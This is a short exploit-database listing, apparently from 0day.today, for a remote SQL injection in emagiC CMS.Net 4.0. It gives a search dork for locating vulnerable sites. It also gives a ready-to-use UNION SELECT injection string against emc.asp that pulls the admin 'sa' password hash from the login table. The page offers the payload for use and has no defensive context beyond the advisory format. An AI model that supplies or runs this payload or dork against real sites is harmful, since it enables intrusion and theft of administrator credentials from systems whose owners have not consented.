[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

emagiC CMS.Net 4.0 (emc.asp) Remote SQL Injection Vulnerability

Author
hak3r-b0y
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2251
Category
web applications
Date add
27-10-2007
Platform
unsorted
===============================================================
emagiC CMS.Net 4.0 (emc.asp) Remote SQL Injection Vulnerability
===============================================================



--------------------

emagiC CMS.Net v4.0 Remote SQL Injection Exploit

--------------------

+ Found  : hak3r-b0y
+ Gr33tz : darko , V4 CrackerS , hacker_alQassam , Ans , Barra, all ans-hacker.com members
+ Script URL : http://www.emagic-cms.com/
+ D0rk : inurl:emc.asp?pageid=
--------------------

Exploit:

emc.asp?pageId=1' UNION SELECT TOP 1 convert(int, password%2b'%20x') FROM EMAGIC_LOGINS where username='sa'--

y0u will find the crypted password

for the admin 'sa'
--------------------



#  0day.today [2024-11-15]  #